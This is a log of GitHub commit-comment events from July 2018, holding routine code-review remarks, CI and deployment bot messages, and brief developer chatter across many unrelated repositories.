{"id":"7963073916","type":"CommitCommentEvent","actor":{"login":"szarnyasg"},"repo":{"name":"travis-ci/docs-travis-ci-com"},"payload":{"comment":{"id":29702052,"position":4,"line":13,"path":"_data/databases.yml","commit_id":"7198d5dca42fefbc3dc07e3458ebd3dfa776ea37","created_at":"2018-07-13T16:14:18Z","updated_at":"2018-07-13T16:14:18Z","author_association":"CONTRIBUTOR","body":"Can you please elaborate?"}},"created_at":"2018-07-13T16:14:18Z"}
{"id":"7963075504","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29702054,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T16:14:36Z","updated_at":"2018-07-13T16:14:36Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-13T16:14:36Z"}
{"id":"7963076915","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29702057,"position":null,"line":null,"path":null,"commit_id":"ca0ea37c799915a34d93b2afa580668ceda48885","created_at":"2018-07-13T16:14:56Z","updated_at":"2018-07-13T16:14:56Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-161453 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-161453\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T16:14:56Z"}
{"id":"7963079245","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29702062,"position":null,"line":null,"path":null,"commit_id":"3d491d5821009901d769f8f22eb3a57b5017f3e9","created_at":"2018-07-13T16:15:23Z","updated_at":"2018-07-13T16:15:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add button to switch Graphy interface off and on](https://trello.com/c/oDAniVYD/42-add-button-to-switch-graphy-interface-off-and-on)"}},"created_at":"2018-07-13T16:15:23Z"}
{"id":"7963079721","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29702063,"position":5,"line":1291,"path":"hash/x68k_flop.xml","commit_id":"a5bca54a8a014e4c35a7a4ea19a48d70b40c8850","created_at":"2018-07-13T16:15:29Z","updated_at":"2018-07-13T16:15:29Z","author_association":"MEMBER","body":"Yeah, it's not a validity error, it's just very poor form.  Either all uppercase or all lowercase in an entry - not some unholy mix."}},"created_at":"2018-07-13T16:15:29Z"}
{"id":"7963081265","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29702065,"position":null,"line":null,"path":null,"commit_id":"3d491d5821009901d769f8f22eb3a57b5017f3e9","created_at":"2018-07-13T16:15:49Z","updated_at":"2018-07-13T16:15:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add button to switch Graphy interface off and on](https://trello.com/c/oDAniVYD/42-add-button-to-switch-graphy-interface-off-and-on)"}},"created_at":"2018-07-13T16:15:49Z"}
{"id":"7963081289","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29702066,"position":null,"line":null,"path":null,"commit_id":"3d491d5821009901d769f8f22eb3a57b5017f3e9","created_at":"2018-07-13T16:15:49Z","updated_at":"2018-07-13T16:15:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add button to switch Graphy interface off and on](https://trello.com/c/oDAniVYD/42-add-button-to-switch-graphy-interface-off-and-on)"}},"created_at":"2018-07-13T16:15:49Z"}
{"id":"7963082456","type":"CommitCommentEvent","actor":{"login":"ljod"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29702070,"position":51,"line":310,"path":"Libs/MRML/Core/vtkMRMLDiffusionWeightedVolumeNode.cxx","commit_id":"43b4ed9c4e8c6e98a8e6a80ad2d2e21997e5b0ff","created_at":"2018-07-13T16:16:04Z","updated_at":"2018-07-13T16:16:04Z","author_association":"NONE","body":"better to compute grad norm here only if needed so code is clearer"}},"created_at":"2018-07-13T16:16:04Z"}
{"id":"7963084390","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29702076,"position":null,"line":null,"path":null,"commit_id":"ecd7ef842d5b42f313219b9f5bdf4bc7919818a9","created_at":"2018-07-13T16:16:28Z","updated_at":"2018-07-13T16:16:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add button to switch Graphy interface off and on](https://trello.com/c/oDAniVYD/42-add-button-to-switch-graphy-interface-off-and-on)"}},"created_at":"2018-07-13T16:16:28Z"}
{"id":"7963085441","type":"CommitCommentEvent","actor":{"login":"ljod"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29702081,"position":49,"line":308,"path":"Libs/MRML/Core/vtkMRMLDiffusionWeightedVolumeNode.cxx","commit_id":"43b4ed9c4e8c6e98a8e6a80ad2d2e21997e5b0ff","created_at":"2018-07-13T16:16:41Z","updated_at":"2018-07-13T16:16:41Z","author_association":"NONE","body":"can delete this line"}},"created_at":"2018-07-13T16:16:41Z"}
{"id":"7963088554","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"greg-1-anderson/gk-8"},"payload":{"comment":{"id":29702089,"position":null,"line":null,"path":null,"commit_id":"47ea07ac1ecbf61e622bb02f5e8604b86ab7f6eb","created_at":"2018-07-13T16:17:22Z","updated_at":"2018-07-13T16:17:22Z","author_association":"OWNER","body":"Created multidev environment [gk-8#pr-depsupda](https://dashboard.pantheon.io/sites/5cbd78f8-3a96-492a-beb0-f892421708d8#pr-depsupda).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-depsupda-gk-8.pantheonsite.io/)"}},"created_at":"2018-07-13T16:17:22Z"}
{"id":"7963093525","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge--Redux"},"payload":{"comment":{"id":29702097,"position":null,"line":null,"path":null,"commit_id":"5aaae35e241623af05118936ae27552df89e260c","created_at":"2018-07-13T16:18:27Z","updated_at":"2018-07-13T16:18:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GET '/smurfs'](https://trello.com/c/VwMF86aI/3-get-smurfs)"}},"created_at":"2018-07-13T16:18:27Z"}
{"id":"7963095774","type":"CommitCommentEvent","actor":{"login":"lenkis"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":29702101,"position":97,"line":100,"path":"doc/1.7/book/getting_started/using_binary.rst","commit_id":"b601ccb4d6954e8008e2f897a638d5a2f4e5aea0","created_at":"2018-07-13T16:18:55Z","updated_at":"2018-07-13T16:18:55Z","author_association":"COLLABORATOR","body":"we got a bug in this section: here we create just one space, the one named 'tester'\r\n\r\nhere and further (line 162 below), we select from that single space, but we select using the primary key (defined first) and the secondary key (defined second)"}},"created_at":"2018-07-13T16:18:55Z"}
{"id":"7963095798","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29702102,"position":null,"line":null,"path":null,"commit_id":"c41a2f40add898a944e7ae364fae37824edb3f26","created_at":"2018-07-13T16:18:56Z","updated_at":"2018-07-13T16:18:56Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-161855 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-161855\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T16:18:56Z"}
{"id":"7963096437","type":"CommitCommentEvent","actor":{"login":"carlhancock"},"repo":{"name":"wp-premium/gravityforms"},"payload":{"comment":{"id":29702103,"position":null,"line":null,"path":null,"commit_id":"42f34c40fc9ee8bff4f716e30ba87149cb33f28e","created_at":"2018-07-13T16:19:04Z","updated_at":"2018-07-13T16:19:04Z","author_association":"NONE","body":"@remcotolsma This repo has been around for a long time as a mirror. One thing I want to mention after this commit was brought to my attention is once you begin making code changes to the Gravity Forms code base this repository is no longer a mirror, it's a fork.  \r\n\r\nOnce it's a fork you will need to completely change the name as well as completely strip the Gravity Forms trademark from the codebase itself.  That would include the name, \"gravityforms\" in the code, etc.\r\n\r\nIf there is some reason Pronamic (or other Gravity Forms developers for that matter) need access to Gravity Forms via Github we'd be glad to discuss giving you access to the official Gravity Forms repo on Github.  While it is currently a private repo, we do grant access to Gravity Forms developers who have been vetted. We are also considering opening up that repo to the public down the road.\r\n\r\nI just wanted to reach out to you directly here as this commit had been brought to my attention and it appears to be taking steps towards being more than a mirror which poses license, trademark and brand confusion issues.  You can reach me directly via my carl at rocketgenius.com email address to discuss further if you would like."}},"created_at":"2018-07-13T16:19:04Z"}
{"id":"7963111382","type":"CommitCommentEvent","actor":{"login":"ljod"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29702129,"position":44,"line":436,"path":"Libs/MRML/Core/vtkMRMLNRRDStorageNode.cxx","commit_id":"675cb0880c48f50aa86c6d5607403170435be8f7","created_at":"2018-07-13T16:22:10Z","updated_at":"2018-07-13T16:22:10Z","author_association":"NONE","body":"please explain padding is the width of the number like 0001 is width 4"}},"created_at":"2018-07-13T16:22:10Z"}
{"id":"7963111658","type":"CommitCommentEvent","actor":{"login":"JosDenmark"},"repo":{"name":"rchain/pi4u"},"payload":{"comment":{"id":29702132,"position":269,"line":269,"path":"comprehensions/categoricallycomprehensive.lyx","commit_id":"7fc29f05219714af62e61a44d0757892a9876a55","created_at":"2018-07-13T16:22:13Z","updated_at":"2018-07-13T16:22:13Z","author_association":"COLLABORATOR","body":"Should be b_{2} no?"}},"created_at":"2018-07-13T16:22:13Z"}
{"id":"7963112965","type":"CommitCommentEvent","actor":{"login":"rgdoliveira"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29702134,"position":19,"line":19,"path":"testing/aports-ghpr/APKBUILD","commit_id":"d102e6e0f490f27a3d320f62f1d04e84b5facbc0","created_at":"2018-07-13T16:22:28Z","updated_at":"2018-07-13T16:22:28Z","author_association":"MEMBER","body":"I'm also curious to know the correct (or best) way do solve dependencies in go packages.."}},"created_at":"2018-07-13T16:22:28Z"}
{"id":"7963119324","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":29702144,"position":null,"line":null,"path":null,"commit_id":"7b98b4e3c6f345084fd3d1e86de536e95ab032e4","created_at":"2018-07-13T16:23:50Z","updated_at":"2018-07-13T16:23:50Z","author_association":"CONTRIBUTOR","body":"Will this work with:\r\n```php\r\nfor (;;) {\r\n    ...\r\n}\r\n```\r\n? :)"}},"created_at":"2018-07-13T16:23:50Z"}
{"id":"7963120215","type":"CommitCommentEvent","actor":{"login":"lapido"},"repo":{"name":"lapido/AssetVerificationAPP"},"payload":{"comment":{"id":29702147,"position":null,"line":null,"path":null,"commit_id":"08737954528a01540daf3fdd2e2ed65f538d2687","created_at":"2018-07-13T16:24:02Z","updated_at":"2018-07-13T16:24:02Z","author_association":"OWNER","body":"ool"}},"created_at":"2018-07-13T16:24:02Z"}
{"id":"7963122721","type":"CommitCommentEvent","actor":{"login":"jgfouca"},"repo":{"name":"E3SM-Project/E3SM"},"payload":{"comment":{"id":29702154,"position":null,"line":null,"path":null,"commit_id":"37985f4efac90c6f46dd4554336bf067b706a380","created_at":"2018-07-13T16:24:31Z","updated_at":"2018-07-13T16:24:31Z","author_association":"MEMBER","body":"@susburrows , you can ignore this. The issue number is referring to an issue in a different repository (ESMCI/CIME)."}},"created_at":"2018-07-13T16:24:31Z"}
{"id":"7963147755","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"eostoolkit/eostoolkit"},"payload":{"comment":{"id":29702202,"position":4,"line":26,"path":"app/containers/Transfer/saga.js","commit_id":"37207a6744f00abfca8f6c431f63332f1aef6663","created_at":"2018-07-13T16:29:52Z","updated_at":"2018-07-13T16:29:52Z","author_association":"MEMBER","body":"👍 I was right about to fix this issue.\r\n\r\nRight now, transferring IQ tokens with 3 decimals causes an error."}},"created_at":"2018-07-13T16:29:52Z"}
{"id":"7963148759","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/Report-Plugin"},"payload":{"comment":{"id":29702206,"position":null,"line":null,"path":null,"commit_id":"88c8ef0c963bfdae9612f3e90890e1fbcc92621b","created_at":"2018-07-13T16:30:07Z","updated_at":"2018-07-13T16:30:07Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 7, column 1),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ByxNilsGFX/Report-Plugin/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `fff6bcea-86b9-11e8-9591-0199feb83f5b`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-13T16:30:07Z"}
{"id":"7963149058","type":"CommitCommentEvent","actor":{"login":"StrikerRUS"},"repo":{"name":"Microsoft/LightGBM"},"payload":{"comment":{"id":29702207,"position":4,"line":96,"path":"docs/Installation-Guide.rst","commit_id":"65e63967e786fe6797f79ba515e39b47ad870dbc","created_at":"2018-07-13T16:30:11Z","updated_at":"2018-07-13T16:30:11Z","author_association":"COLLABORATOR","body":"@chivee doc-test fails. Blank line is neede here."}},"created_at":"2018-07-13T16:30:11Z"}
{"id":"7963149885","type":"CommitCommentEvent","actor":{"login":"BrunoEduardoCSantos"},"repo":{"name":"laboshinl/loam_velodyne"},"payload":{"comment":{"id":29702211,"position":null,"line":null,"path":null,"commit_id":"44fb3e41ca5b2db559fc0dad717f65ccab2f5351","created_at":"2018-07-13T16:30:21Z","updated_at":"2018-07-13T16:30:21Z","author_association":"NONE","body":"I am having memory issues with scanIndices . If I clear it on MultiScanregistration there is no error, although I can't get odometry. Any solution for that?"}},"created_at":"2018-07-13T16:30:21Z"}
{"id":"7963150053","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29702212,"position":24,"line":21,"path":"src/views/index.pug","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T16:30:23Z","updated_at":"2018-07-13T16:30:23Z","author_association":"CONTRIBUTOR","body":"omg 你嘗試在寫 pug 了！\r\nGood Job"}},"created_at":"2018-07-13T16:30:23Z"}
{"id":"7963151342","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29702214,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-13T16:30:39Z","updated_at":"2018-07-13T16:30:39Z","author_association":"NONE","body":"@vondele I do not, it seems like I just have to put it in a cron script that runs hourly.\r\nOS suppose to do these kind of stuff automatically but somehow its trigger didn't work."}},"created_at":"2018-07-13T16:30:39Z"}
{"id":"7963151702","type":"CommitCommentEvent","actor":{"login":"jonhoo"},"repo":{"name":"zonyitoo/memcached-rs"},"payload":{"comment":{"id":29702215,"position":null,"line":null,"path":null,"commit_id":"fe62a69faa869fdce1d4ffdbb5a9df96a4493b0c","created_at":"2018-07-13T16:30:45Z","updated_at":"2018-07-13T16:30:45Z","author_association":"CONTRIBUTOR","body":"I'd suggest adding `cargo check --all --all-targets` as a `script` to your `.travis.yml` to check for these things in CI :)"}},"created_at":"2018-07-13T16:30:45Z"}
{"id":"7963156350","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/lobby-items"},"payload":{"comment":{"id":29702223,"position":null,"line":null,"path":null,"commit_id":"3153cf1869ac796aba678e6b6d6c5620bcc0f46b","created_at":"2018-07-13T16:31:47Z","updated_at":"2018-07-13T16:31:47Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, and the build was created with the following warnings:\n\n1. Sanitized project name, from \"0\" to \"0\"\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-13T16:31:47Z"}
{"id":"7963157642","type":"CommitCommentEvent","actor":{"login":"rayznation"},"repo":{"name":"rayznation/Hello-World"},"payload":{"comment":{"id":29702227,"position":1,"line":1,"path":"README.md","commit_id":"fc9897b96a7f301a541e4bb99a1da4b57773ec3f","created_at":"2018-07-13T16:32:05Z","updated_at":"2018-07-13T16:32:05Z","author_association":"OWNER","body":"Hi Human"}},"created_at":"2018-07-13T16:32:05Z"}
{"id":"7963167014","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29702246,"position":14,"line":9,"path":"community/gst-libav/APKBUILD","commit_id":"0ada3d03765cb8f96b378a3256ac123b28bcf2a4","created_at":"2018-07-13T16:34:11Z","updated_at":"2018-07-13T16:34:11Z","author_association":"CONTRIBUTOR","body":"@prspkt: I am not very happy with meaningless changes like this `makedepends` change for the following reasons:\r\n- people have different preferences (I find your change reduce readability)\r\n- it makes it more timeconsuming to backport changes\r\n- it adds a risk of introducing regressions that is missed by a tired human eye\r\n- it only adds very small value if any at all\r\n\r\nThe `license` change is good though.\r\n"}},"created_at":"2018-07-13T16:34:11Z"}
{"id":"7963170639","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29702253,"position":null,"line":null,"path":null,"commit_id":"c619caf856d8a5d05595554aa0f404cd399eee14","created_at":"2018-07-13T16:34:59Z","updated_at":"2018-07-13T16:34:59Z","author_association":"CONTRIBUTOR","body":"The software evolution will hopefully be continued also for [another structured bug report](https://github.com/coccinelle/coccinelle/issues/145 \"Software improvements for safe usage of the function “realpath”\")."}},"created_at":"2018-07-13T16:34:59Z"}
{"id":"7963176231","type":"CommitCommentEvent","actor":{"login":"chenga2782"},"repo":{"name":"paesanilab/potential_fitting"},"payload":{"comment":{"id":29702267,"position":6,"line":18,"path":"configuration_generator/src/qcalc.py","commit_id":"4148b128afa120a828294abc59db61de90a2ba70","created_at":"2018-07-13T16:36:16Z","updated_at":"2018-07-13T16:36:16Z","author_association":"COLLABORATOR","body":"Shouldn't this be\r\n`config['config_generator']['code']`\r\nnot\r\n`config['program']['code']`"}},"created_at":"2018-07-13T16:36:16Z"}
{"id":"7963176447","type":"CommitCommentEvent","actor":{"login":"echatav"},"repo":{"name":"rchain/pi4u"},"payload":{"comment":{"id":29702269,"position":269,"line":269,"path":"comprehensions/categoricallycomprehensive.lyx","commit_id":"7fc29f05219714af62e61a44d0757892a9876a55","created_at":"2018-07-13T16:36:18Z","updated_at":"2018-07-13T16:36:18Z","author_association":"COLLABORATOR","body":"yup, fixed this a few mins ago"}},"created_at":"2018-07-13T16:36:18Z"}
{"id":"7963176603","type":"CommitCommentEvent","actor":{"login":"kelno"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29702270,"position":46,"line":1677,"path":"src/game/Guilds/Guild.cpp","commit_id":"f2d14ad30d129c480c3bf36009bdfc77630ecbb5","created_at":"2018-07-13T16:36:20Z","updated_at":"2018-07-13T16:36:20Z","author_association":"NONE","body":"I think this needs to be :\r\n`data << uint8(socketSlot - SOCK_ENCHANTMENT_SLOT);`\r\n\r\nClient does not use EnchantmentSlot index but a socket index. With current code you get gems offseted by 2.\r\n"}},"created_at":"2018-07-13T16:36:20Z"}
{"id":"7963178129","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/CloudSigns"},"payload":{"comment":{"id":29702272,"position":null,"line":null,"path":null,"commit_id":"5280138aa619be5772bf0f90eb0275a421eb7048","created_at":"2018-07-13T16:36:40Z","updated_at":"2018-07-13T16:36:40Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ByxNilsGFX/CloudSigns/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `eaa118b2-86ba-11e8-9a06-47e2f35c1132`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-13T16:36:40Z"}
{"id":"7963180364","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29702279,"position":null,"line":null,"path":null,"commit_id":"ac9ac26bb1042df642168c99897b893b57c26562","created_at":"2018-07-13T16:37:10Z","updated_at":"2018-07-13T16:37:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T16:37:10Z"}
{"id":"7963181049","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29702280,"position":6,"line":10,"path":"src/sass/page_pay.scss","commit_id":"99d3a6a3c10dd17e8011402f4b719182b393ef90","created_at":"2018-07-13T16:37:17Z","updated_at":"2018-07-13T16:37:17Z","author_association":"CONTRIBUTOR","body":"不會影響到樣式的 import，我個人習慣放在 base 前面"}},"created_at":"2018-07-13T16:37:17Z"}
{"id":"7963184104","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29702287,"position":null,"line":null,"path":null,"commit_id":"7826cd29c26e6ba4e7ab38acf2e9d432cd02ed3d","created_at":"2018-07-13T16:37:58Z","updated_at":"2018-07-13T16:37:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-363](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-363).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-363-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T16:37:58Z"}
{"id":"7963186550","type":"CommitCommentEvent","actor":{"login":"echatav"},"repo":{"name":"rchain/pi4u"},"payload":{"comment":{"id":29702292,"position":null,"line":null,"path":null,"commit_id":"7fc29f05219714af62e61a44d0757892a9876a55","created_at":"2018-07-13T16:38:31Z","updated_at":"2018-07-13T16:38:31Z","author_association":"COLLABORATOR","body":"`id` is sort of hidden in `[b|b <- u]` which can be translated to `[id|b<-u]`. Perhaps I should be more explicit about that and also change the other structure morphism rules like `[b1 | b1xb2 <- u]` is the same as `[pi1 | b1xb2 <- u ]`."}},"created_at":"2018-07-13T16:38:31Z"}
{"id":"7963188376","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29702294,"position":null,"line":null,"path":null,"commit_id":"4086e911f8cb3b17fc04556b80ca7d59d00ddbd9","created_at":"2018-07-13T16:38:57Z","updated_at":"2018-07-13T16:38:57Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-163856 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-163856\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T16:38:57Z"}
{"id":"7963189209","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29702301,"position":null,"line":null,"path":null,"commit_id":"a6c2d19f0b93d41bc3dcecbc05d7ba826b5aaace","created_at":"2018-07-13T16:39:09Z","updated_at":"2018-07-13T16:39:09Z","author_association":"OWNER","body":"Now, the concept is very much similar to the previous concept.\r\nif you wish to add multiple files to cache simply add using caches.add();"}},"created_at":"2018-07-13T16:39:09Z"}
{"id":"7963190019","type":"CommitCommentEvent","actor":{"login":"elfmaster"},"repo":{"name":"elfmaster/skeksi_virus"},"payload":{"comment":{"id":29702303,"position":null,"line":null,"path":null,"commit_id":"0d0da6fb1a8785460f93d2187e8068de18d5d4da","created_at":"2018-07-13T16:39:19Z","updated_at":"2018-07-13T16:39:19Z","author_association":"OWNER","body":"Pointer dereferencing to modify the virus signature"}},"created_at":"2018-07-13T16:39:19Z"}
{"id":"7963195208","type":"CommitCommentEvent","actor":{"login":"MicroshaftCorp"},"repo":{"name":"elfmaster/skeksi_virus"},"payload":{"comment":{"id":29702320,"position":null,"line":null,"path":null,"commit_id":"0d0da6fb1a8785460f93d2187e8068de18d5d4da","created_at":"2018-07-13T16:40:24Z","updated_at":"2018-07-13T16:40:24Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-13T16:40:24Z"}
{"id":"7963197179","type":"CommitCommentEvent","actor":{"login":"toschneck"},"repo":{"name":"3jmaster/docker-headless-vnc-container"},"payload":{"comment":{"id":29702324,"position":null,"line":null,"path":null,"commit_id":"f30253a51018e47362ade948e8219eda1baccdd2","created_at":"2018-07-13T16:40:50Z","updated_at":"2018-07-13T16:40:50Z","author_association":"NONE","body":"@3jmaster  great to hear :heart_eyes: \r\n"}},"created_at":"2018-07-13T16:40:50Z"}
{"id":"7963200121","type":"CommitCommentEvent","actor":{"login":"kukulich"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":29702331,"position":null,"line":null,"path":null,"commit_id":"7b98b4e3c6f345084fd3d1e86de536e95ab032e4","created_at":"2018-07-13T16:41:30Z","updated_at":"2018-07-13T16:41:30Z","author_association":"CONTRIBUTOR","body":"I’ve forgotten :( However it should be very easy to fix it :)"}},"created_at":"2018-07-13T16:41:30Z"}
{"id":"7963202127","type":"CommitCommentEvent","actor":{"login":"Topfuelorfool"},"repo":{"name":"Topfuelorfool/imgonnatry"},"payload":{"comment":{"id":29702337,"position":1,"line":1,"path":"README.md","commit_id":"763463a6e653e0dc4971256ad9ac1acf45dac2ce","created_at":"2018-07-13T16:41:57Z","updated_at":"2018-07-13T16:41:57Z","author_association":"OWNER","body":"> inchbyinchanythingisacinch"}},"created_at":"2018-07-13T16:41:57Z"}
